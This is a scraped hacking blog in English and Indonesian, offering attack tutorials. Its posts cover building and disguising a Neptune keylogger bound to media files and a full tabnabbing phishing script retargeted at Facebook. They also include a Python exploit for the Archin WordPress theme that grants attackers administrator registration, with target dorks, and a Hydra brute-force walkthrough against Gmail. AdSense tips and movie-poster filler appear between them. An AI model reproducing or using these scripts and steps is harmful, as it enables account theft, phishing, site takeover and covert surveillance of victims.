\

Featured

Powered by Blogger.

Blog Archive

Browsing "Older Posts"



What Is Keyloggers?

Using key logger utility you will be able to establish full control over your computer. You will also find
out, what was going on your computer in your absence: what was run and typed etc which act as best
children internet protection software. Using the keylogging program constantly, you can restore the
previously typed text in case you have lost it. Keystroke logger software works in the hidden mode and
invisible on Windows operating system including Windows 7/VISTA/XP/Server 2008/NT/98 etc.

Lets start the guide: How to use it. ?

1) first you need to download this application, you can download it from its website Download, but
currently its under maintenance..

Download here - Click Here To Download

2) I am giving tut about Neptune 1.4 only, but you can use 1.45 also, it is a updated version that sends
screenshot also.


After downloading, Extract the .rar file, open the project's folder, click on project Neptune v1.4, Now it
will show a window like shown below, Do whatever mentioned in screen shot.
Note: i am giving tut for getting logs by mail(gmail here), but you can use other also, or can use ftp
server also.

3) Now go to 'Server Creation' tab and press 'Generate new server' under 'server creation', and give
name of your keylogger and thats it.. you are done :)

4) Make it self destructive :In tab Extra options, you can check 'self destruct on ', if you want
that it should be remove after any particular date.

5) Add Icon: You can also add any icon to the final keylogger file, for that go to 'Server
Creation' tab and select 'Use file icon' under 'server settings' and select any icon file.

6) Binding: You can bind it with any other file also, for that press the file binder button, a
window will open(as shown in screen shot)then right click and select 'add file' and then select
anything for ex. any software, movie, video, song etc. with which you wanna bind it. 5.1) After
selecting the binding file, dont close this window, and go to step 3.


7) Sreenshots: (only available in naptune 1.45) Go to Extra options, check 'send screen shots' under
'Screenshots'


How To Hack Facebook Account With Keyloggers

By admin → Saturday, August 31, 2013

Hey friends, i m back
base, i will explain things with practical example. So lets learn..

1. A hacker say(me Sam Idies) customizes current webpage by editing/adding some new
parameters and variables.( check the code below for details)

2. I sends a copy of this web page to victim whose account or whatever i want to hack.

3. Now when user opens that link, a webpage similar
to this one will open in iframe
containing the real page with the help of java script.

4. The user will be able to browse the website like the original one, like forward
backward and can navigate through pages.

5. Now if victim left the new webpage open for certain period of time, the tab or
website will change to Phish Page or simply called fake page which will look absolutely
similarly to original one.

6. Now when user enter his/her credentials (username/password), he is entering that in
Fake page and got trapped in our net that i have laid down to hack him.

Here end's the attack scenario for advanced tabnabbing.

Before coding Part lets first share tips to protect yourself from this kind of attack
because its completely undetectable and you will never be able to know that your
account is got hacked or got compromised. So first learn how to protect our-self from
Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:

1. Always use anti-java script plugin's in your web browser that stops execution of
malicious javascripts. For example: Noscript for Firefox etc.

2. If you notice any suspicious things happening, then first of all verify the URL in the
address bar.

3. If you receive any link in the Email or chat message, never directly click on it. Always
prefer to type it manually in address bar to open it, this may cost you some manual
work or time but it will protect you from hidden malicious URL's.

4. Best way is to use any good web security toolbar like AVG web toolbar or Norton
web security toolbar to protect yourself from such attacks.

5. If you use ideveloper or Firebug, then verify the headers by yourself if you find
something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify all users about
the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still
we follow the same concept. I will just extend his concept to next level.
First sample code for doing tabnabbing with the help of iframes:
<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )
-->
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height:
100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y:
auto; overflow-x: hidden;}
</style>
<body>
Copyright www.cyber-worldd.blogspot.in
26
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the
"Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the
"Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to
the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers
Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This
sets the favicon. It will not switch or clear the "Real"
favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico";
//Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet
Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before
switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
Copyright www.cyber-worldd.blogspot.in
27
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on
it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab
changes in Internet Web browser
Copyright www.cyber-worldd.blogspot.in
28
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to
FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;
//Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links =
document.getElementsByTagName("head")[0].getElementsByTagName("l
ink");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut
icon")  {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:

1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the
facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name
here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original
'real' page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email
accounts, Facebook or any other social networking website. What you need to do is that
just edit the above mentioned 9 fields and save it as anyname.htm and upload it any
free web hosting website along with favicon file and send the link to user in form of email
or chat message ( hidden using href keyword in html or spoofed using some other
technique).


Tabnapping

By admin →
Selamat datang di blog IDCA :D
langsung saja deh, neh saya share trik Deface "Wordpress Theme Archin", tapi karena saya males ngetik jadi saya copas aja blognya si Mr Xenophobic. Ijin ya om XD XD


ok lanjut. berikut tool yang dibutuhkan :

 Python 










install Python, setelah selesai menginstall python, buka notepad dan paste script berikut :

 # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
     
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
save filenya dengan berekstensi .py 
lalu cari target website dengan mengunakan dork berikut :

 /wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/

disini saya anggap anda sudah menemukan targetnya.

buka websitenya, trus di pencet CTRL+U, dan akan muncul tab baru, seperti dibawah ini :
 setelah itu, kita klik url 
http://site.com/wp-content/themes/temanya/style.css
dan ganti style.css menjadi hades_framework/option_panel/ajax.php.
sehingga menjadi seperti ini :
http://site.com/wp-content/themes/temanya/hades_framework/option_panel/ajax.php
 jika website itu blank / tidak ada text apapun berarti itu vuln.
setelah itu buka start ~> Run ~> ketik "cmd" (akan muncul sebuah console / command prompt)

ketik "cd C:\" (karena script yg diatas saya letakkan di local disk)
ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :
jika muncul gambar seperti itu, tandanya itu berhasil. dan sekarang yang kita butuhkan adalah registrasi ke target website dengan menuju ke http://targetnya.com/wp-login.php trus klik register (setiap website berbeda bahasanya) untuk itu coba lihat screenshot berikut :
yang digaris merah itu, dalam bahasa inggris adalah register.
nb : jika tidak ada tombol register, brarti website itu mendisablenya.
dan lakukan registrasi seperti biasanya
nb : form yg atas adalah form username dan yg dibawahnya ada form email.

setelah melakukan registrasi, silahkan kalian cek email kalian yg sudah kalian isi di script.
ada kan ? klo ada buka email tersebut lalu buka login pagenya dan login dengan username tersebut.

Sumber : http://blog.xeno-info.tk/2013/08/archin-wordpress-theme-32.html

Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

By admin → Saturday, August 24, 2013


italian job poster
  die hard poster       sword fish poster
 
tron poster  hackers poster       war games poster

pirates of silicon valley poster  antitrust poster       sneakers poster 

Tags:

Best Hackers Movies Download

By admin →



How To Earn through Adsense Many People Getting Trouble While Applying For Adsense Account Many People Don't Get Approved For Their Adsense Account Here I Will Give You Some Tips How To Get Approved Fast Direct From Your Website.

5 Requirements..........




1.  Your Blog Must Have A Domain Name .Com Domain Name (Its Also Help You To Boost Your Alexa Rank)
2.  Your Blog Have 300k (3000) Alexa Rank
3.  Your Blog Should Have Minimum 100 Post
4.  All Post Must Be Leagal Contents Of Written By Your Own Authors
5.  Minimum Daily Page Views 1k Per Day

10 Tips.........



1.  Never Use Proxy While Applying For Adsense Account
2.  Don't Use Any Other Publisher Network Ads
3.  Never Use Proxy Visitors Or Fake Visitors
4.  Post Fresh And Unique And Leagle Contents
5.  Your Contents Have Minimum 300-500 Words In A Post
6.  Your Site Speed Must Be Fast While Loading
7.  Use Unique Theme
8.  Must Read One Time Google Adsense Policy
9.  For Good Trafic Post Your Contents On Social Sites Like Facebook And Twitters
10. Make Some Backlinks

              Share it and Feel Free to Comment :]

Get Ad-sense Account Approved Fast Direct From Your Website : 15 Tips And Requirements

By admin → Tuesday, August 20, 2013
ᗪσὠиℓσαᗪ нαcκєяℤ & cяαcκєяℤ ραɠє αρρ ƒяσм нєяє
http://www.appsgeyser.com/getwidget/Hackerz%20and%20Crackerz%20page
Tags:

ᗪσὠиℓσαᗪ нαcκєяℤ & cяαcκєяℤ ραɠє αρρ ƒσя αиᗪяσìᗪ ƒяσм нєяє

By admin → Saturday, August 17, 2013



A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

How to do Brute force or (Dictionary Attack)
So here we are going to use Backtrack 5, Hydra Attack. I will use fake                      G-mail a/c for this tutorial.

Requirements.
  • Backtrack 4 or 5 with Internet connection
  • Password.txt file (That contains Possible passwords)    
  • Brain.

I took fake ID of G-mail (hackerseven5@gmail.com) as my victim it's password is '521478963', and Suppose i know the possibilities of password so, I will make password.txt file to do brute force attack like this >

Click on Image to enlarge it

Now it's time to start attack using Hydra gtk.
Go to > Application > Backtrack > Privilege Escalation > Password Attacks > Online Attacks > hydra-gtk.

Click on Image to enlarge it

And it will start like this >

Click on Image to enlarge it

Fill all info in this way :-


* Single Target  = smtp.gmail.com

* Port          =    465 
* Protocol    =    smtp
* mark        =   Use SSl, Be Verbose, Show Attempts

Click on Image to enlarge it

After setting your Target, go on Password tab >

Fill all info in this way !!

* Username        =  G-mail  ID (hackerseven5@gmail.com)
* Password list   =    upload your possibilites password file 
(save your password.txt file on desktop)

Click on Image to enlarge it

After all go to > Start Tab and Clik on Start.

Click on Image to enlarge it

So, your Brute Force Attack has been started :-

Click on Image to enlarge it

After all it will try Brute force attack using every password and try to login  
with possibilities password, if you were lucky !! then it will show successful message like this.

Click on Image to enlarge it

I no using this attack it is very hard to hack any G-mail Password, but it can help you to recover your hacked ID or forget password.

How to do Hydra (Brute force Attack) to hack any E-mail Password

By admin → Thursday, August 15, 2013


Hacking Tools


H4CK1N5 T00l5
-------------------------------------------------------------------------------------------------------------------------------------------
Thanks for Downloading T00l5 from our page : Please Share it :) to Increase Us. And if you want to request for any tool you can send us mail on :shubhamgupta109.1995@gmail.com:

Tags:

Hacking Tools

By admin →